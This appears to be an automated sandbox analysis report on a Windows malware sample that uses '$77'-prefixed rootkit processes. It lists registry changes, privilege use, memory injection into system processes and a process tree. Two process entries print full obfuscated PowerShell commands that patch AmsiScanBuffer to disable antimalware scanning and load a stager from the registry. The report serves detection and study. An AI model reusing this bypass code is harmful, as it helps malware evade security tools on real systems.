\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018800C6A6EFFAB" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "0018800C6A6EFFAB" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018800C6A6EFFAB = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000a8408a7191d78d49839702b8b8640236000000000200000000001066000000010000200000008b419b6c78993ddbd669c238a8d276bcf84dab6af0aa62f60a47f4600fe27fba000000000e8000000002000020000000e7fbace245619daa4776fc4c1591cca5e38cce8a0b12c87c490b29801c91221680000000fb88e86933c069cce7ad92b19aadf70e5ce5c3d953dd62b8cb2fa27bd8d3919b8cf59d879b213aa4ac01dbce46ac01351f80d3877260af8cbc59b8ac68f244c740cc6efea0826ba7b70aecf236415ec65e0ec4e46613ae48ae9f5e94979c219c1fd123feeeebe0d63b4ac3f2d86b5db3941446998e836c521a62f5a2398bdb72400000001099fec7a9d985d8a9908e4a39f1b90a22ecc315e090032f9b4f8114077727cd35105432a76e3f5c4159346fe1953ddb931bae1c27e10c51d4612977a8ac8755 mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={1B9F3068-2880-49DA-8415-B6C2DFAAB02A}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe -
Modifies registry class 1 IoCs
Processes:
80dcd56f6d8e3324d715736b66858795.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ 80dcd56f6d8e3324d715736b66858795.exe -
Runs ping.exe 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
80dcd56f6d8e3324d715736b66858795.exepowershell.exepowershell.EXEdllhost.exepowershell.EXEpowershell.exepid process 5052 80dcd56f6d8e3324d715736b66858795.exe 5052 80dcd56f6d8e3324d715736b66858795.exe 5052 80dcd56f6d8e3324d715736b66858795.exe 4072 powershell.exe 4072 powershell.exe 4284 powershell.EXE 4284 powershell.EXE 4284 powershell.EXE 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1592 powershell.EXE 1592 powershell.EXE 5108 powershell.exe 5108 powershell.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 5108 powershell.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 5108 powershell.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 5108 powershell.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 5108 powershell.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1844 dllhost.exe 1592 powershell.EXE 1592 powershell.EXE 1844 dllhost.exe 1844 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
80dcd56f6d8e3324d715736b66858795.exe$77.sedsvc.exepowershell.exepowershell.EXEdllhost.exedwm.exepowershell.EXEpowershell.exesvchost.exedescription pid process Token: SeDebugPrivilege 5052 80dcd56f6d8e3324d715736b66858795.exe Token: SeShutdownPrivilege 848 $77.sedsvc.exe Token: SeDebugPrivilege 4072 powershell.exe Token: SeDebugPrivilege 4284 powershell.EXE Token: SeIncreaseQuotaPrivilege 4072 powershell.exe Token: SeSecurityPrivilege 4072 powershell.exe Token: SeTakeOwnershipPrivilege 4072 powershell.exe Token: SeLoadDriverPrivilege 4072 powershell.exe Token: SeSystemProfilePrivilege 4072 powershell.exe Token: SeSystemtimePrivilege 4072 powershell.exe Token: SeProfSingleProcessPrivilege 4072 powershell.exe Token: SeIncBasePriorityPrivilege 4072 powershell.exe Token: SeCreatePagefilePrivilege 4072 powershell.exe Token: SeBackupPrivilege 4072 powershell.exe Token: SeRestorePrivilege 4072 powershell.exe Token: SeShutdownPrivilege 4072 powershell.exe Token: SeDebugPrivilege 4072 powershell.exe Token: SeSystemEnvironmentPrivilege 4072 powershell.exe Token: SeRemoteShutdownPrivilege 4072 powershell.exe Token: SeUndockPrivilege 4072 powershell.exe Token: SeManageVolumePrivilege 4072 powershell.exe Token: 33 4072 powershell.exe Token: 34 4072 powershell.exe Token: 35 4072 powershell.exe Token: 36 4072 powershell.exe Token: SeIncreaseQuotaPrivilege 4072 powershell.exe Token: SeSecurityPrivilege 4072 powershell.exe Token: SeTakeOwnershipPrivilege 4072 powershell.exe Token: SeLoadDriverPrivilege 4072 powershell.exe Token: SeSystemProfilePrivilege 4072 powershell.exe Token: SeSystemtimePrivilege 4072 powershell.exe Token: SeProfSingleProcessPrivilege 4072 powershell.exe Token: SeIncBasePriorityPrivilege 4072 powershell.exe Token: SeCreatePagefilePrivilege 4072 powershell.exe Token: SeBackupPrivilege 4072 powershell.exe Token: SeRestorePrivilege 4072 powershell.exe Token: SeShutdownPrivilege 4072 powershell.exe Token: SeDebugPrivilege 4072 powershell.exe Token: SeSystemEnvironmentPrivilege 4072 powershell.exe Token: SeRemoteShutdownPrivilege 4072 powershell.exe Token: SeUndockPrivilege 4072 powershell.exe Token: SeManageVolumePrivilege 4072 powershell.exe Token: 33 4072 powershell.exe Token: 34 4072 powershell.exe Token: 35 4072 powershell.exe Token: 36 4072 powershell.exe Token: SeDebugPrivilege 4284 powershell.EXE Token: SeDebugPrivilege 1844 dllhost.exe Token: SeShutdownPrivilege 316 dwm.exe Token: SeCreatePagefilePrivilege 316 dwm.exe Token: SeDebugPrivilege 1592 powershell.EXE Token: SeDebugPrivilege 5108 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2276 svchost.exe Token: SeIncreaseQuotaPrivilege 2276 svchost.exe Token: SeSecurityPrivilege 2276 svchost.exe Token: SeTakeOwnershipPrivilege 2276 svchost.exe Token: SeLoadDriverPrivilege 2276 svchost.exe Token: SeSystemtimePrivilege 2276 svchost.exe Token: SeBackupPrivilege 2276 svchost.exe Token: SeRestorePrivilege 2276 svchost.exe Token: SeShutdownPrivilege 2276 svchost.exe Token: SeSystemEnvironmentPrivilege 2276 svchost.exe Token: SeUndockPrivilege 2276 svchost.exe Token: SeManageVolumePrivilege 2276 svchost.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
$77.sedsvc.exeConhost.exeConhost.exepid process 848 $77.sedsvc.exe 848 $77.sedsvc.exe 3424 Conhost.exe 4084 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
80dcd56f6d8e3324d715736b66858795.execmd.exe$77.WWI Provider Host.exepowershell.EXEdllhost.exelsass.exedescription pid process target process PID 5052 wrote to memory of 848 5052 80dcd56f6d8e3324d715736b66858795.exe $77.sedsvc.exe PID 5052 wrote to memory of 848 5052 80dcd56f6d8e3324d715736b66858795.exe $77.sedsvc.exe PID 5052 wrote to memory of 848 5052 80dcd56f6d8e3324d715736b66858795.exe $77.sedsvc.exe PID 5052 wrote to memory of 912 5052 80dcd56f6d8e3324d715736b66858795.exe $77.WWI Provider Host.exe PID 5052 wrote to memory of 912 5052 80dcd56f6d8e3324d715736b66858795.exe $77.WWI Provider Host.exe PID 5052 wrote to memory of 1056 5052 80dcd56f6d8e3324d715736b66858795.exe $77.Install.exe PID 5052 wrote to memory of 1056 5052 80dcd56f6d8e3324d715736b66858795.exe $77.Install.exe PID 5052 wrote to memory of 1056 5052 80dcd56f6d8e3324d715736b66858795.exe $77.Install.exe PID 5052 wrote to memory of 5004 5052 80dcd56f6d8e3324d715736b66858795.exe cmd.exe PID 5052 wrote to memory of 5004 5052 80dcd56f6d8e3324d715736b66858795.exe cmd.exe PID 5004 wrote to memory of 5024 5004 cmd.exe PING.EXE PID 5004 wrote to memory of 5024 5004 cmd.exe PING.EXE PID 5004 wrote to memory of 4776 5004 cmd.exe PING.EXE PID 5004 wrote to memory of 4776 5004 cmd.exe PING.EXE PID 912 wrote to memory of 4072 912 $77.WWI Provider Host.exe powershell.exe PID 912 wrote to memory of 4072 912 $77.WWI Provider Host.exe powershell.exe PID 4284 wrote to memory of 1844 4284 powershell.EXE dllhost.exe PID 4284 wrote to memory of 1844 4284 powershell.EXE dllhost.exe PID 4284 wrote to memory of 1844 4284 powershell.EXE dllhost.exe PID 4284 wrote to memory of 1844 4284 powershell.EXE dllhost.exe PID 4284 wrote to memory of 1844 4284 powershell.EXE dllhost.exe PID 4284 wrote to memory of 1844 4284 powershell.EXE dllhost.exe PID 4284 wrote to memory of 1844 4284 powershell.EXE dllhost.exe PID 4284 wrote to memory of 1844 4284 powershell.EXE dllhost.exe PID 4284 wrote to memory of 1844 4284 powershell.EXE dllhost.exe PID 4284 wrote to memory of 1844 4284 powershell.EXE dllhost.exe PID 4284 wrote to memory of 1844 4284 powershell.EXE dllhost.exe PID 1844 wrote to memory of 584 1844 dllhost.exe winlogon.exe PID 1844 wrote to memory of 676 1844 dllhost.exe lsass.exe PID 1844 wrote to memory of 956 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 316 1844 dllhost.exe dwm.exe PID 1844 wrote to memory of 512 1844 dllhost.exe svchost.exe PID 676 wrote to memory of 2844 676 lsass.exe sysmon.exe PID 1844 wrote to memory of 716 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 844 1844 dllhost.exe svchost.exe PID 676 wrote to memory of 2844 676 lsass.exe sysmon.exe PID 1844 wrote to memory of 1088 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1108 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1180 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1216 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1268 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1288 1844 dllhost.exe svchost.exe PID 676 wrote to memory of 4108 676 lsass.exe wmiprvse.exe PID 676 wrote to memory of 4108 676 lsass.exe wmiprvse.exe PID 676 wrote to memory of 4108 676 lsass.exe wmiprvse.exe PID 676 wrote to memory of 4108 676 lsass.exe wmiprvse.exe PID 676 wrote to memory of 4108 676 lsass.exe wmiprvse.exe PID 676 wrote to memory of 4108 676 lsass.exe wmiprvse.exe PID 676 wrote to memory of 4108 676 lsass.exe wmiprvse.exe PID 676 wrote to memory of 4108 676 lsass.exe wmiprvse.exe PID 676 wrote to memory of 4108 676 lsass.exe wmiprvse.exe PID 676 wrote to memory of 4108 676 lsass.exe wmiprvse.exe PID 676 wrote to memory of 4108 676 lsass.exe wmiprvse.exe PID 676 wrote to memory of 4108 676 lsass.exe wmiprvse.exe PID 1844 wrote to memory of 1316 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1424 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1432 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1500 1844 dllhost.exe svchost.exe PID 676 wrote to memory of 2188 676 lsass.exe svchost.exe PID 1844 wrote to memory of 1516 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1636 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1696 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1704 1844 dllhost.exe svchost.exe PID 1844 wrote to memory of 1804 1844 dllhost.exe svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:676
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:584
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:316
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{29ee1cc6-5340-4ac1-810a-27bd7035b933}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1844
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{de891a68-cce4-46ea-8cea-e32fbe04ef3a}2⤵PID:1868
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:512
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1088
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1216 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2776
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:SvFBkGvvqaNK{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$WAZySZdQDgdNJN,[Parameter(Position=1)][Type]$hhlxguHdRn)$LevuJyCmaTl=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$LevuJyCmaTl.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$WAZySZdQDgdNJN).SetImplementationFlags('Runtime,Managed');$LevuJyCmaTl.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$hhlxguHdRn,$WAZySZdQDgdNJN).SetImplementationFlags('Runtime,Managed');Write-Output $LevuJyCmaTl.CreateType();}$HEcBJhYsIRWxh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$XNJcDCYpqnMoGl=$HEcBJhYsIRWxh.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$vRaiGxMGPNqETvYRHvb=SvFBkGvvqaNK @([String])([IntPtr]);$rzJcSjnxUkTaVFdyXIPUts=SvFBkGvvqaNK @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$PWDXlFkKnVf=$HEcBJhYsIRWxh.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$diOhohuAIUZtSU=$XNJcDCYpqnMoGl.Invoke($Null,@([Object]$PWDXlFkKnVf,[Object]('Load'+'LibraryA')));$NARBTZlcHnXnyXhrQ=$XNJcDCYpqnMoGl.Invoke($Null,@([Object]$PWDXlFkKnVf,[Object]('Vir'+'tual'+'Pro'+'tect')));$HTmLMzr=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($diOhohuAIUZtSU,$vRaiGxMGPNqETvYRHvb).Invoke('a'+'m'+'si.dll');$jkaVYFxJXNGpOuXdU=$XNJcDCYpqnMoGl.Invoke($Null,@([Object]$HTmLMzr,[Object]('Ams'+'iSc'+'an'+'Buffer')));$EpFJhcMLjy=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NARBTZlcHnXnyXhrQ,$rzJcSjnxUkTaVFdyXIPUts).Invoke($jkaVYFxJXNGpOuXdU,[uint32]8,4,[ref]$EpFJhcMLjy);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$jkaVYFxJXNGpOuXdU,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NARBTZlcHnXnyXhrQ,$rzJcSjnxUkTaVFdyXIPUts).Invoke($jkaVYFxJXNGpOuXdU,[uint32]8,0x20,[ref]$EpFJhcMLjy);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1592 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4340
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:DghJHHMgzIMm{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mYnEObHFVUitkB,[Parameter(Position=1)][Type]$ZZXxGuMCZh)$ptFZaceDNym=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$ptFZaceDNym.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$mYnEObHFVUitkB).SetImplementationFlags('Runtime,Managed');$ptFZaceDNym.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$ZZXxGuMCZh,$mYnEObHFVUitkB).SetImplementationFlags('Runtime,Managed');Write-Output $ptFZaceDNym.CreateType();}$pxoXQYImIWJTe=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$TBCmkQbPVORBQt=$pxoXQYImIWJTe.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$epRVEsNAIKeWNIDcsaO=DghJHHMgzIMm @([String])([IntPtr]);$qgGtancAakPiltSyBQwbXs=DghJHHMgzIMm @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$XypoUROdUvY=$pxoXQYImIWJTe.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$nlABNPBbgPiuJj=$TBCmkQbPVORBQt.Invoke($Null,@([Object]$XypoUROdUvY,[Object]('Load'+'LibraryA')));$dshhBhIONdcTosVzT=$TBCmkQbPVORBQt.Invoke($Null,@([Object]$XypoUROdUvY,[Object]('Vir'+'tual'+'Pro'+'tect')));$swJRaOC=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nlABNPBbgPiuJj,$epRVEsNAIKeWNIDcsaO).Invoke('a'+'m'+'si.dll');$QBHFTaYOxjvmuSxUb=$TBCmkQbPVORBQt.Invoke($Null,@([Object]$swJRaOC,[Object]('Ams'+'iSc'+'an'+'Buffer')));$uWlwBSaJkR=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dshhBhIONdcTosVzT,$qgGtancAakPiltSyBQwbXs).Invoke($QBHFTaYOxjvmuSxUb,[uint32]8,4,[ref]$uWlwBSaJkR);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$QBHFTaYOxjvmuSxUb,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dshhBhIONdcTosVzT,$qgGtancAakPiltSyBQwbXs).Invoke($QBHFTaYOxjvmuSxUb,[uint32]8,0x20,[ref]$uWlwBSaJkR);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4284
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1268
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1288
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1180
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1424
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1432
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2488
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1108
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1516
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1636
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1696
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1704
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1500
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1804
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1820
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1912
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1928
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2024
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2068
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2032
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2188
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2260
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:844
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
- Checks SCSI registry key(s)
PID:716
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2512
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2528
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2540
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2752
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2808
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2812
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2844
-
